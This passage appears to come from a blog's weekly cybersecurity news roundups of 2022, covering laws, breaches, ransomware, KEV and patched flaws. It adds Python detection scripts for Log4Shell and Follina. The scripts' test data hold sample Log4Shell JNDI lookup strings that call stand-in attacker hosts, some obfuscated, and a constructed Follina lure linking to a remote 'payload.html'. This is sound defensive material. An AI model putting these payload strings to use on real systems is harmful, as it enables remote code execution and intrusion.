Cybersecurity Saturday

From Capitol Hill, Security Week reports

Two bipartisan cybersecurity bills were signed into law on Tuesday, June 21, 2022, by US President Joe Biden: the Federal Rotational Cyber Workforce Program Act of 2021, and the State and Local Government Cybersecurity Act of 2021.

The Federal Rotational Cyber Workforce Program Act, which has been around since 2018, proposes a program under which certain federal employees can be temporarily moved to other agencies in an effort to boost their skills.

Agencies can determine whether a position involving IT or cybersecurity is eligible for the program. The Office of Personnel Management is tasked with creating an operation plan, and the Government Accountability Office must assess the effectiveness of the program.

The State and Local Government Cybersecurity Act of 2021, is meant to improve collaboration between the Department of Homeland Security and state, local, tribal and territorial governments.

From the cyber vulnerabilities front —

Health IT Security informs us

Application Programming Interface (API) adoption is steadily increasing in the healthcare sector, but APIs do not come without cybersecurity risks. In fact, Gartner predicted that API attacks would become the most common attack vector by 2022.

In healthcare, evidence suggests that API adoption could revolutionize interoperability efforts and health data exchange. In addition, providers are increasingly implementing APIs to comply with the CMS Interoperability and Patient Access final rule. Meanwhile, the HL7 Fast Healthcare Interoperability Resources (FHIR) standard is quickly gaining recognition in the health IT space.

In a recent report, Imperva partnered with the Marsh McLennan Global Cyber Risk Analytics Center to analyze API-related incident data and quantify the cost of API insecurity. Researchers discovered that the lack of security APIs may cause $12 billion to $23 billion in average annual API-related cyber loss in the US and anywhere from $41 billion to $75 billion globally.

“These estimates provide a view on losses that are entirely avoidable,” the report suggested.

“If companies made an upfront investment in properly securing all of their APIs, their API-related losses could decrease significantly even as their API adoption continues to increase.”

Cybersecurity Dive tells us

Malicious actors continue to dog VMware Horizon and Unified Access Gateway server deployments, capitalizing on unpatched Log4Shell, the Cybersecurity and Infrastructure Security Agency said Thursday in a joint advisory with the U.S. Coast Guard Cyber Command.

The agencies are calling for organizations to update all VMware Horizon and UAG systems and, if fixes weren’t applied in Dec. 2021, organizations should consider their systems compromised and start threat hunting. 
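For readers who take the advisory's threat-hunting advice, here is an added Python example (not code from CISA, the Coast Guard or Cybersecurity Dive) that hunts access-log lines from a Horizon or other Tomcat/Apache front end for the Log4Shell JNDI lookup string. It normalises the two evasions that defeat a plain string match, URL encoding and nested lookups such as ${${lower:j}ndi:...}, and reports the scheme and callback host of each lookup. The log lines, addresses and host names are constructed for the example.

```python
"""Hunt for Log4Shell (CVE-2021-44228) JNDI lookup strings in access-log lines.

Added example, not code from the CISA/USCGC advisory.  The log lines below are
constructed; the IPs and host names are documentation/example values."""
import re
from urllib.parse import unquote

# Innermost lookups only (no nested "${" or "}" inside); applied repeatedly so
# that ${${lower:j}${::-n}di:...} collapses to ${jndi:...}.
_DEFAULT_VALUE = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")            # ${x:-v}    -> v
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.I)    # ${lower:j} -> j
# ${jndi:<scheme>://<host[:port]>...} once the line has been normalised
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*://([^/}\s\"]+)", re.I)


def normalize(text, max_rounds=10):
    """URL-decode (twice, for double encoding) and collapse nested lookups."""
    text = unquote(unquote(text))
    for _ in range(max_rounds):
        new = _CASE_LOOKUP.sub(lambda m: m.group(1), text)
        new = _DEFAULT_VALUE.sub(lambda m: m.group(1), new)
        if new == text:
            break
        text = new
    return text


def find_jndi(line):
    """Return [(scheme, target), ...] for every JNDI lookup found in the line."""
    return [(scheme.lower(), target)
            for scheme, target in _JNDI.findall(normalize(line))]


def hunt(lines):
    """Run find_jndi over a log and return one hit record per lookup."""
    hits = []
    for number, line in enumerate(lines, start=1):
        for scheme, target in find_jndi(line):
            hits.append({"line": number, "src": line.split()[0],
                         "scheme": scheme, "target": target})
    return hits


# Constructed Apache/Tomcat-style access-log lines (line 1 is benign).
SAMPLE_LOG = [
    '10.0.0.5 - - [23/Jun/2022:10:01:02 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [23/Jun/2022:10:01:09 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://203.0.113.9:1389/a}"',
    '198.51.100.7 - - [23/Jun/2022:10:02:11 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" '
    '"${${lower:j}${upper:n}di:${lower:ldap}://evil.example:1389/x}"',
    '198.51.100.8 - - [23/Jun/2022:10:03:30 +0000] '
    '"GET /portal/?q=%24%7Bjndi%3Armi%3A%2F%2F203.0.113.20%3A1099%2Fobj%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '198.51.100.9 - - [23/Jun/2022:10:04:41 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" '
    '"${${::-j}ndi:dns://x.example/ping}"',
]

if __name__ == "__main__":
    for hit in hunt(SAMPLE_LOG):
        print(f"line {hit['line']}: {hit['src']} -> {hit['scheme']}://{hit['target']}")
```

A hit on a Horizon or UAG host that was unpatched in December 2021 is exactly the "assume compromise" trigger the advisory describes; the callback host in each hit is the pivot for the next hunting step (outbound LDAP/RMI/DNS connections from the server to that address).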

Cybersecurity Dive adds

Two of every five organizations don’t have strong confidence in their open source software security, according to a joint study from The Linux Foundation and Snyk, a firm that specializes in developer security. Just half of organizations actually have a security policy related to open source development or usage, the research showed. 

The average application development project has 49 vulnerabilities and 80 direct dependencies, according to the report. 

The time required to fix vulnerabilities in open source more than doubled to 110 days in 2021, compared with 41 days during 2018, the report found.

From the ransomware front, we have a link to the latest Bleeping Computer’s The Week in Ransomware.

The Conti ransomware gang has finally ended their charade and turned off their Tor data leak and negotiation sites, effectively shutting down the operation.

Since May, a lone Conti member has been posting data from older victims to make the gang appear alive, but in reality, Conti shut down last month.

The members are now long spread out in smaller cells among different operations, making it more challenging to target the crime syndicate.

From the cyber defenses front, ISACA reports on “Why (and How to) Dispose of Digital Data.”

Cybersecurity Saturday

Cybersecurity Dive provides five takeaways from the RSA conference held in San Francisco from June 6 through 9.

From the cyber breach front, MeriTalk provides more details on the settlement of the lawsuit against OPM over the massive 2015 data breach.

The lead counsel in the class action said that individual victims are in line for minimum payments of $700 each under the terms of the settlement, which still needs to be finalized. * * *

The preliminary settlement agreement will be subject to further consideration at a fairness hearing set for Oct. 14.

From the cyber vulnerabilities front,

  • Here is a link to CISA’s known exploited vulnerabilities catalog. Bookmark that one.
  • Becker’s Hospital Review explains why “Cybersecurity experts say that the two biggest threats to healthcare cybersecurity are insider threats and ransomware.”
  • Security Week reports “Microsoft has fixed roughly 50 vulnerabilities with its June 2022 Patch Tuesday updates, including the actively exploited flaw known as Follina and CVE-2022-30190.”

From the ransomware front

  • Cybersecurity Dive discusses how ransomware groups are shifting tactics and objectives.
  • Here is a link to Bleeping Computer’s The Week in Ransomware.

From the cyber defense front

  • HHS’s Healthcare Cybersecurity Coordination Center (HC3) offers a presentation about strengthening cyber posture in the health sector.
  • TechRepublic reports that half of IT leaders want to implement more robust alternatives to passwords, and it describes options.
  • ISACA Journal offers an article on how businesses can reduce cybersecurity exposures to and from third parties.

Cybersecurity Saturday

From the cyberattack front, Federal News Network reports

A D.C. federal judge this week preliminarily approved a $63 million settlement as part of a class action lawsuit brought by victims of the breach into OPM databases. The breach was uncovered in 2015. By then, hackers had stolen the records of nearly 22 million current and former federal employees. The Chinese government is widely thought to be behind the attack. The proposed settlement would only compensate those who can prove they were financially affected by the breach. The court’s order set a Dec. 23 deadline to submit a claim.

Health IT Security adds “Shields Health Care Group reported a healthcare cyberattack to HHS impacting 2 million individuals. The Massachusetts-based healthcare group provides MRI, PET/CT, and ambulatory surgical services to patients across New England at more than 30 locations.”

From the cybervulnerabilities front, Cyberscoop explains

When the Cybersecurity and Infrastructure Security Agency [CISA] debuted its list of known, exploited vulnerabilities in November, it was nearly 300 flaws long and came attached to an order for federal agencies to fix them quickly.

Now, as of this week, the catalog known as “KEV” or the “Must-Patch” list is well on its way to 800 listings, and it’s the “No. 1 topic” that CISA Executive Director for Cybersecurity Eric Goldstein says comes up in his frequent, daily meetings with businesses.

The reason, said Goldstein, is that the private sector has — without any order from his agency — adopted the KEV list as a guide for the vulnerabilities they focus on, rather than relying on the traditional open-source industry standard Common Vulnerability Scoring System for assessing the severity of software weaknesses.

This week, CISA first added 36 and then three more known, exploited vulnerabilities to its catalog.
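Goldstein's point, that KEV membership rather than CVSS score is what drives the patch queue, is easy to operationalise. Here is an added Python example (not CISA's code) that ranks a set of vulnerability findings by whether the CVE is in the KEV catalog and how close its remediation due date is, and only then by CVSS. The catalog excerpt uses the live feed's field names but is constructed here so the script runs offline; the three real CVE IDs are Log4Shell, the Confluence flaw and Follina, their dates are shown for illustration and should be checked against the live feed, and the CVE-2022-9999x identifiers are placeholders that stand in for "high CVSS but not in KEV".

```python
"""Rank vulnerability findings by CISA KEV membership first, CVSS second.

Added example, not CISA's code.  The feed excerpt and the findings are
constructed: entries mirror the real feed's field names, the CVE-2022-9999x
IDs are placeholders, and the dates are illustrative."""
import json
from datetime import date

# The live feed (not fetched here; load its JSON into load_kev() in production).
KEV_FEED_URL = ("https://www.cisa.gov/sites/default/files/feeds/"
                "known_exploited_vulnerabilities.json")

SAMPLE_KEV = {
    "title": "CISA Catalog of Known Exploited Vulnerabilities",
    "catalogVersion": "sample", "dateReleased": "2022-06-17T00:00:00.0000Z", "count": 3,
    "vulnerabilities": [
        {"cveID": "CVE-2021-44228", "vendorProject": "Apache", "product": "Log4j2",
         "vulnerabilityName": "Apache Log4j2 Remote Code Execution Vulnerability",
         "dateAdded": "2021-12-10", "shortDescription": "JNDI lookup RCE (Log4Shell).",
         "requiredAction": "Apply updates per vendor instructions.",
         "dueDate": "2021-12-24", "notes": ""},
        {"cveID": "CVE-2022-26134", "vendorProject": "Atlassian",
         "product": "Confluence Server and Data Center",
         "vulnerabilityName": "Atlassian Confluence Remote Code Execution Vulnerability",
         "dateAdded": "2022-06-02", "shortDescription": "Unauthenticated OGNL injection RCE.",
         "requiredAction": "Apply updates per vendor instructions.",
         "dueDate": "2022-06-06", "notes": ""},
        {"cveID": "CVE-2022-30190", "vendorProject": "Microsoft", "product": "Windows",
         "vulnerabilityName": "Microsoft Windows MSDT Remote Code Execution Vulnerability",
         "dateAdded": "2022-06-14", "shortDescription": "MSDT URL protocol RCE (Follina).",
         "requiredAction": "Apply updates per vendor instructions.",
         "dueDate": "2022-07-05", "notes": ""},
    ],
}

# Constructed scanner output: one finding per (asset, CVE) with its CVSS base score.
SAMPLE_FINDINGS = [
    {"asset": "horizon-01", "cve": "CVE-2021-44228", "cvss": 10.0},
    {"asset": "wiki-01",    "cve": "CVE-2022-26134", "cvss": 9.8},
    {"asset": "ws-0042",    "cve": "CVE-2022-30190", "cvss": 7.8},
    {"asset": "db-03",      "cve": "CVE-2022-99999", "cvss": 9.1},  # placeholder, not in KEV
    {"asset": "ws-0101",    "cve": "CVE-2022-99998", "cvss": 5.3},  # placeholder, not in KEV
]


def load_kev(feed):
    """Index a KEV feed (dict or JSON text) by CVE ID."""
    if isinstance(feed, (str, bytes)):
        feed = json.loads(feed)
    return {entry["cveID"]: entry for entry in feed["vulnerabilities"]}


def prioritize(findings, kev, today):
    """Order findings: KEV entries by due date (overdue first), then everything
    else by CVSS.  A KEV entry with CVSS 7.8 therefore outranks a non-KEV 9.1."""
    ranked = []
    for finding in findings:
        entry = kev.get(finding["cve"])
        if entry:
            due = date.fromisoformat(entry["dueDate"])
            tier = "KEV-overdue" if due < today else "KEV-due"
            key = (0, due.toordinal(), -finding["cvss"])
        else:
            due, tier, key = None, "not-KEV", (1, 0, -finding["cvss"])
        ranked.append({**finding, "tier": tier, "due": due, "_key": key})
    ranked.sort(key=lambda r: r["_key"])
    return [{k: v for k, v in r.items() if k != "_key"} for r in ranked]


if __name__ == "__main__":
    for row in prioritize(SAMPLE_FINDINGS, load_kev(SAMPLE_KEV), date(2022, 6, 18)):
        print(f"{row['tier']:<12} {row['cve']}  {row['asset']:<11} cvss={row['cvss']}  due={row['due']}")
```

Run on the sample data, the CVSS 7.8 Follina finding lands above the CVSS 9.1 placeholder because the former is known to be exploited and has a federal due date; that inversion is the whole reason the private sector has adopted the list as Goldstein describes.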

The HHS Health Sector Cybersecurity Coordination Center posted its May report about vulnerabilities of interest to the health sector.

Cybersecurity Dive updates us on Microsoft’s Follina and Atlassian’s Confluence recent zero-day vulnerabilities.

CISA released a joint federal agency alert on People’s Republic of China-sponsored cyber actors.

From the ransomware front, Security Week reports

It doesn’t pay to pay [ransom]. This advice on ransomware payment is often given, but rarely enumerated. Now it has been. A new study finds that 80% of companies that paid a ransom were hit a second time, with 40% paying again. Seventy percent of these paid a higher amount the second time round.

These figures come from an April 2022 Cybereason study that queried 1,456 cybersecurity professionals from organizations with 700 or more employees. The shocking nature of the statistics, published in Ransomware: The True Cost to Business (PDF) go much deeper. 

It’s not a problem that can be ignored with the vague belief, ‘it won’t happen to me’. Seventy-three percent of organizations have suffered at least one ransomware attack in the past 24 months – up 33% from last year.

Sixty percent of companies admitted ransomware gangs had been in their network from one to six months before they were discovered – a key indicator of a double extortion attack. But paying the double extortion fee doesn’t really help; nearly 200,000 companies never received their data back after paying. And the criminals still have the data regardless. Thirty-five percent of companies suffered C-level ‘resignations’ because of a ransomware attack.

Other key findings of the research include the prevalence of the supply chain as a factor in the attack. Sixty-four percent of companies believe the ransomware gang got into their network via one of their suppliers or business partners.

Health IT Security adds

Healthcare ransomware attacks are not slowing down, prompting an increased demand for reliable cyber insurance policies. But as healthcare cyberattacks skyrocket, cyber insurers are pushing up prices or leaving the market altogether, Sophos stated in its “State of Ransomware in Healthcare 2022” report.

Sophos surveyed 5,600 IT professionals, including 381 in healthcare, to garner insights on how healthcare organizations are navigating the cyber threat landscape.

The report found that 66 percent of surveyed healthcare organizations were hit by ransomware in 2021, up from just 34 percent in 2020. About 61 percent of those attacks resulted in data encryption. Survey results also revealed that healthcare was the most likely sector to pay a ransom. Just over 60 percent of respondents who experienced encryption admitted to paying the ransom, compared to a cross-sector average of 46 percent.

Here is a link to Bleeping Computer’s Week in Ransomware.

From the cyber defense front, here are links to a Wall Street Journal report on personal password management and a CISA article on multi-factor authentication.

Cybersecurity Saturday

From Capitol Hill, Cyberscoop reports

A sweeping federal privacy bill unveiled Friday [June 3] would give Americans unprecedented control over how companies collect and use their data. 

The discussion draft was released by Sen. Roger Wicker, R-Miss., and Reps. Cathy McMorris Rodgers, R-Wa., and Frank Pallone, D-Mass. It represents the results of months of intense negotiations and is a step toward federal privacy protections long-awaited by civil society groups.

The 64-page privacy framework introduces a range of changes designed to give consumers more control over their data. It would require covered companies to limit data collection, allow consumers to turn off targeted advertisements, grant broad protections for Americans against discriminatory uses of their data and rein in third-party data collection.

The bill also carves out special protections regarding biometric data, a growing source of concern for privacy and human rights activists. Under the legislation, companies can only collect and share biometric data under specific instances including responding to a warrant and affirmative consent.

The FEHBlog notes that the data security and protection of covered data section 208 is integrated with the corollary HIPAA and Gramm-Leach-Bliley rules.

From the law enforcement front

Cybersecurity tells us

The FBI managed to detect and mitigate an attack by Iranian state-sponsored hackers against Boston’s Children’s Hospital last summer, FBI Director Christopher Wray revealed on Wednesday.

“Quick actions by everyone involved, especially at the hospital, protected both the network and the sick kids that were dependent on it,” Wray said at the Boston Conference on Cyber Security.

Wray called the incident one of the “most despicable cyberattacks” he’s seen, but he noted that the threat was hardly an isolated one. In 2021 the FBI saw ransomware attacks against 14 of the 16 services deemed critical infrastructure by the U.S. government, including hospitals. The FBI issued a warning last November that Iranian hackers were seeking data that could be used to hack U.S. companies.

The agency has been “laser-focused” on potential threats to critical infrastructure resulting from the United States’ support of Ukraine during an ongoing invasion of the nation by Russia. The United States has observed Russia “taking specific preparatory steps towards potential destructive attacks, both here and abroad,” Wray said. And the fallout of those attacks could get worse.

Nextgov informs us

Federal law enforcement agencies have seized several internet domain names in pursuit of an international investigation into websites that permit users to buy stolen personal data and information or hack other networks. 

Announced on Wednesday [June 1], the domain names OVH Booter, WeLeakInfo and IPStress.in have all been procured by the Federal Bureau of Investigation and Department of Justice with a seizure warrant issued by a U.S. District Court for the District of Columbia. 

“Today, the FBI and the department stopped two distressingly common threats: websites trafficking in stolen personal information and sites which attack and disrupt legitimate internet businesses,” said U.S. Attorney Matthew Graves. “Cybercrime often crosses national borders. Using strong working relationships with our international law enforcement partners, we will address crimes like these that threaten privacy, security and commerce around the globe.”

From the vulnerabilities front over the last week

  • CISA has updated Cybersecurity Advisory AA22-138B: Threat Actors Chaining Unpatched VMware Vulnerabilities for Full System Control, originally released May 18, 2022. The advisory has been updated to include additional indicators of compromise and detection signatures, as well as tactics, techniques, and procedures reported by trusted third parties. CISA encourages organizations to review the latest update to AA22-138B and update impacted VMware products to the latest version or remove impacted versions from organizational networks. 
  • Microsoft has released workaround guidance to address a remote code execution (RCE) vulnerability—CVE-2022-30190, known as “Follina”—affecting the Microsoft Support Diagnostic Tool (MSDT) in Windows. A remote, unauthenticated attacker could exploit this vulnerability to take control of an affected system. Microsoft has reported active exploitation of this vulnerability in the wild. CISA urges users and administrators to review Microsoft’s Guidance for CVE-2022-30190 Microsoft Support Diagnostic Tool Vulnerability and apply the necessary workaround. Bleeping Computer offers more details on Follina, and Wired offers an update on this Follina warning.
  • Atlassian has released new Confluence Server and Data Center versions to address remote code execution vulnerability CVE-2022-26134 affecting these products. An unauthenticated, remote attacker could exploit this vulnerability to execute code remotely. Atlassian reports that there is known exploitation of this vulnerability. CISA strongly urges organizations to review Confluence Security Advisory 2022-06-02 and upgrade Confluence Server and Confluence Data Center.
  • The Healthcare Cybersecurity Coordination Center offered a webinar on the Return of Emotet and the Threat to the Health Sector. Emotet has been called the world’s most dangerous malware.
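On the Follina item above, a mail gateway or incident responder can triage a suspect Word document without opening it. Here is an added Python example (not Microsoft's or CISA's code) that unzips a .docx, reads its relationship parts, and flags any oleObject relationship whose target is external, which is how the Follina lure pulls a remote HTML page into Word; a second check looks for the ms-msdt: URL scheme in HTML that was fetched from such a target. Both documents and the HTML snippet are constructed in memory, and 203.0.113.5 is a documentation address.

```python
"""Triage a .docx for the Follina (CVE-2022-30190) delivery pattern.

Added example, not Microsoft's or CISA's code.  The two documents and the
HTML snippet are constructed in memory; 203.0.113.5 is a documentation address."""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_OBJECT = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
HYPERLINK = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"
MSDT_SCHEME = re.compile(r"ms-msdt:", re.I)


def external_ole_targets(docx_bytes):
    """Return (rels_part, target) for every oleObject relationship whose target
    is external.  Normal documents carry OLE objects inside the package; a remote
    oleObject target is the lure's way of fetching attacker HTML into Word."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as pkg:
        for name in pkg.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(pkg.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("TargetMode") == "External" and rel.get("Type") == OLE_OBJECT:
                    hits.append((name, rel.get("Target")))
    return hits


def html_invokes_msdt(html_text):
    """True if fetched HTML tries to hand an ms-msdt: URL to Windows."""
    return MSDT_SCHEME.search(html_text) is not None


def triage(docx_bytes, fetched_html=None):
    """Combine the two indicators into a verdict: clean / suspicious / follina."""
    if not external_ole_targets(docx_bytes):
        return "clean"
    if fetched_html is not None and html_invokes_msdt(fetched_html):
        return "follina"
    return "suspicious"


def _make_docx(extra_rels):
    """Build a minimal .docx in memory; an external hyperlink is included in
    both variants because that is ordinary and must not be flagged."""
    rels = (f'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
            f'<Relationships xmlns="{REL_NS}">'
            f'<Relationship Id="rId1" Type="{HYPERLINK}" '
            f'Target="https://www.cisa.gov/" TargetMode="External"/>'
            f'{extra_rels}</Relationships>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as pkg:
        pkg.writestr("[Content_Types].xml", "<Types/>")
        pkg.writestr("word/document.xml", "<document/>")
        pkg.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()


BENIGN_DOCX = _make_docx("")            # constructed: external hyperlink only
SUSPECT_DOCX = _make_docx(              # constructed: external oleObject target
    f'<Relationship Id="rId996" Type="{OLE_OBJECT}" '
    f'Target="http://203.0.113.5/payload.html" TargetMode="External"/>')
SAMPLE_PAYLOAD_HTML = ('<html><body><script>'
                       'window.location.href = "ms-msdt:/id PCWDiagnostic ...";'
                       '</script></body></html>')  # constructed; parameters omitted

if __name__ == "__main__":
    print("benign :", triage(BENIGN_DOCX))
    print("suspect:", triage(SUSPECT_DOCX), external_ole_targets(SUSPECT_DOCX))
    print("with HTML:", triage(SUSPECT_DOCX, SAMPLE_PAYLOAD_HTML))
```

The same relationship check applies to other Office package formats, since they share the OPC relationship schema; RTF carriers of the same lure need a different parser. Microsoft's published workaround, backing up and then deleting the HKEY_CLASSES_ROOT\ms-msdt registry key, removes the protocol handler that the fetched HTML depends on, so the second indicator is exactly what that workaround neutralises.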

From the ransomware front over the last week

The Wall Street Journal reports, “Russia-linked ransomware groups are splitting into smaller cells or cycling through different types of malware in attempts to evade a growing array of U.S. sanctions and law-enforcement pressure, cybersecurity experts say.”

CISA issued an alert on the Karakurt Data Extortion Group. “Karakurt victims have not reported encryption of compromised machines or files; rather, Karakurt actors have claimed to steal data and threatened to auction it off or release it to the public unless they receive payment of the demanded ransom. Known ransom demands have ranged from $25,000 to $13,000,000 in Bitcoin, with payment deadlines typically set to expire within a week of first contact with the victim.”

Here is a link to the latest Bleeping Computer’s Week in Ransomware.

From the cyber defense front

  • Cyberscoop offers a video interview with Jim Richberg, Public Sector Field CISO and VP of Information Security at Fortinet concerning “important strategies to counter today’s heightened threat environment.”
  • ZDNet identifies five simple errors that can make your “cloud” an attractive target for hackers.
  • Security Week discusses four tactics to protect email systems.
  • Health IT Security delves into the topic of HIPAA Physical Safeguards.

Cybersecurity Saturday

From Capitol Hill, Health IT Security reports

The US Senate Committee on Health, Education, Labor, and Pensions (HELP) held a full committee hearing on May 18 to discuss the need for an increased focus on education and healthcare cybersecurity.

“Attacks on healthcare are increasing in volume, variety, and impact—with consequences that now include the loss of life,” Joshua Corman, founder of I Am the Cavalry, said in his testimony.

“While directionally correct steps have been taken, we’re getting worse faster than we’re getting better. Bold actions and assistance will be required to change this trajectory, address these market failures, lack of incentives, and historical under-investments.”

Healthcare Dive adds

* Internal actors continue to pose a sticky cybersecurity problem for healthcare companies despite not causing a majority of data breaches, according to a new data breach report from Verizon.

* Employees were responsible for 39% of healthcare breaches last year. That’s compared to just 18% across all industries, Verizon found.

* The makeup of the insider breach has shifted from generally malicious misuse incidents to miscellaneous errors, with employees being more than 2.5 times more likely to make an error than purposefully misuse their access. Data misdelivery — like sending an email to the wrong person — along with device or document loss are the most common employee errors in healthcare, according to the report.

CISA offers its assistance:

Cyber actors routinely exploit poor security configurations (either misconfigured or left unsecured), weak controls, and other poor cyber hygiene practices to gain initial access or as part of other tactics to compromise a victim’s system. This joint Cybersecurity Advisory identifies commonly exploited controls and practices and includes best practices to mitigate the issues. This advisory was coauthored by the cybersecurity authorities of the United States, Canada, New Zealand, the Netherlands, and the United Kingdom.

Download the PDF version of this report (pdf, 430kb).

Also from the vulnerability front, Cybersecurity Dive reports

Recurring critical vulnerabilities for VMware products this year indicate a worrying trend for customers that suggests the virtualization leader is taking a more reactive approach to security.

The company’s VMware Horizon product got hit hard by the Log4j vulnerability, and earlier this month VMware found itself entangled in an emergency directive from the Cybersecurity and Infrastructure Security Agency (CISA) that impacts up to 10 VMware products. 

It was the 10th emergency directive issued by CISA since the agency was founded in late 2018. 

Virtualization software is ubiquitous and managing the technology is further complicated by its many parts, ExtraHop CISO Jeff Costlow wrote in an email. Threat actors target vulnerabilities across these disaggregated systems before patches are released or deployed by impacted organizations.

VMware’s reputation in this regard has also taken a hit. 

Perhaps that’s what led to this. The Wall Street Journal reports

Broadcom Inc. Chief Executive Hock Tan’s $61 billion deal to buy VMware Inc. marks the biggest bet yet that the boom in enterprise software demand will endure despite the economic tumult—and that bundling disparate offerings of low-profile products can yield outsize returns. 

Mr. Tan built Broadcom into a microchip powerhouse by acquiring makers of a host of unsexy-but-essential components, then cutting costs and leveraging the company’s growing pricing power. He is now banking that the same model will work in corporate software.

The deal to buy VMware, announced Thursday after The Wall Street Journal reported on details of the talks earlier in the week, would push Broadcom deeper into a software world populated by incumbents such as International Business Machines Corp. and Oracle Corp. as well as independent companies that specialize in niche applications. 

CISA added 20 known exploited vulnerabilities to its catalog this past week.

Bleeping Computer’s the Week in Ransomware was not published this week. Have a good Memorial Day Weekend.

Cybersecurity Update

From Capitol Hill, Nextgov informs us

Having cleared the Senate in January, the State and Local Government Cybersecurity Act passed the House Tuesday and now awaits President Joe Biden’s signature.

The bill updates the House Homeland Security Act to direct the Department of Homeland Security to improve information sharing and coordination with state, local and tribal governments—all of which face growing risks of cyberattack. The legislation requires federal cybersecurity officials to share cybersecurity threat, vulnerability and breach data with states and localities, and provide some recovery resources when attacks occur.

From the vulnerabilities front —

Federal News Network reports

Agencies have until Monday [May 23] to mitigate vulnerabilities in five products from VMware that permit attackers to have deep access without the need to authenticate.

The Cybersecurity and Infrastructure Security Agency issued a new emergency directive today saying the vulnerabilities in VMware Workspace ONE Access (Access), VMware Identity Manager (vIDM), VMware vRealize Automation (vRA), VMware Cloud Foundation, and vRealize Suite Lifecycle Manager put federal networks and systems at immediate risk.

“These vulnerabilities pose an unacceptable risk to federal network security,” said CISA Director Jen Easterly in a release. “CISA has issued this Emergency Directive to ensure that federal civilian agencies take urgent action to protect their networks. We also strongly urge every organization — large and small — to follow the federal government’s lead and take similar steps to safeguard their networks.”

Here’s a link to the CISA website on this emergency directive.

CISA also released an analysis of Fiscal Year 2021 Risk and Vulnerability Assessments.

[This] analysis and infographic details the findings from the 112 Risk and Vulnerability Assessments (RVAs) conducted across multiple sectors in Fiscal Year 2021 (FY21). 

The analysis details a sample attack path comprising 11 successive tactics, or steps, a cyber threat actor could take to compromise an organization with weaknesses that are representative of those CISA observed in FY21 RVAs. The infographic highlights the three most successful techniques for each tactic that the RVAs documented. Both the analysis and the infographic map threat actor behavior to the MITRE ATT&CK® framework. 

CISA also added two known exploited vulnerabilities to its catalog last week.

From the ransomware front

Cybersecurity Dive reports

Most executives have and are willing to pay ransoms in the event of an attack, despite broad and consistent advice to the contrary. 

Nearly four in five organizations impacted by ransomware attacks have paid the ransom to regain access to corporate data, according to a survey conducted last month by Kaspersky.

The findings, while not surprising, highlight the extent to which a widely acknowledged best practice is rarely followed. Cybersecurity professionals, including Kaspersky, consistently advise businesses hit by ransomware to never pay the ransom.

Cyberscoop tells us

The federal government has made strides in deterring ransomware over the past year, but still has a number of milestones to reach, according to a new paper from the Institute for Security and Technology’s Ransomware Task Force. * * *

Of the 48 specific recommendations the Ransomware Task Force made in its initial report, 12 have seen tangible progress in the year since. Some initial steps have been taken on 29 recommendations, while seven recommendations have seen no action.

The United States has made the most progress in addressing the RTF’s recommendations for deterring ransomware, according to Friday’s update. In addition to the Department of Homeland Security launching a hiring “sprint” to combat cyber crime, the Justice Department last year created its own ransomware task force. And at the event Friday, Cybersecurity and Infrastructure Security Agency Director Jen Easterly said the DHS unit is creating another task force to collaborate with the FBI and other agencies that fight cybercrime.

The Healthcare Cybersecurity Coordination Center released a PowerPoint on major cyber organizations of the Russian Intelligence Services.

Bleeping Computer reports

The notorious Conti ransomware gang has officially shut down their operation, with infrastructure taken offline and team leaders told that the brand is no more.

This news comes from Advanced Intel’s Yelisey Boguslavskiy, who tweeted [last Thursday] afternoon that the gang’s internal infrastructure was turned off. * * *

While it may seem strange for Conti to shut down in the middle of their information war with Costa Rica, Boguslavskiy tells us that Conti conducted this very public attack to create a facade of a live operation while the Conti members slowly migrated to other, smaller ransomware operations.

Of course, here is a link to the Bleeping Computer’s Week in Ransomware

From the cyber defenses front

The Wall Street Journal reports

The Justice Department on Thursday [May 19] urged prosecutors to narrow their enforcement of the nation’s main anti-hacking law in a bid to protect legitimate researchers who probe technology for security flaws.

The policy change is a victory for the many cyber professionals and academics who have criticized the Computer Fraud and Abuse Act for potentially criminalizing research that security experts see as key to protecting computer systems from cyberattacks.

Health Data Management discusses seven key steps for avoiding cyberattacks.

1. Protect all workloads
2. Know your adversary
3. Be ready when every second counts
4. Adopt a zero-trust approach
5. Monitor the cybercriminal underground
6. Invest in elite threat hunting
7. Build a cybersecurity culture

CISA offers an updated list of its “free” cybersecurity services, tools, and resources.

Cybersecurity Saturday

From our Nation’s Capital, Cybersecurity Dive reports

On the one-year anniversary of the Executive Order on Improving the Nation’s Cybersecurity, industry experts say the Biden administration has made significant inroads in raising software security standards, but additional work and financial support is necessary to achieve security end goals. 

The Office of Management and Budget’s (OMB) federal zero trust strategy enjoys almost unanimous support from federal cybersecurity decision makers, however two-thirds of federal cybersecurity decision makers said the three-year timeline was unrealistic, according to a study from MeriTalk, sponsored by AWS, CrowdStrike and Zscaler. Just 14% of those surveyed believe the program is properly funded.

Almost two-thirds of federal officials expect to achieve zero trust goals by the goal date of 2024, according to a separate study from General Dynamics Information Technology. However, many of those officials see significant challenges, including a lack of sufficient IT staff and the need to replace legacy infrastructure.

My, how time flies.

Cyberwire adds

